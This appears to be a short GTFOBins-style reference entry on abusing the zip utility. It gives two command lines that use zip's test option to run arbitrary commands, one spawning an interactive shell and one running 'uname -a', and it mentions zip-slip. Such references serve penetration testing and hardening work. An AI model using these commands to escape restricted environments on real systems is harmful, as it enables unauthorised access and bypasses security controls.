When dealing with zip, it may also be worth looking at the zip-slip vulnerability.
It can be used to break out from restricted environments by spawning an interactive system shell.
Can be used to execute arbitrary commands on a system and spawn shells either directly or otherwise.
zip /tmp/out.zip /etc/hostname -T --unzip-command="sh #"It can be used to break out from the intended program by running non-interactive system commands.
Can be used to execute arbitrary commands on a system. Specifics vary depending on the version of zip used.
zip /tmp/out.zip /etc/hostname -T --unzip-command="uname -a #"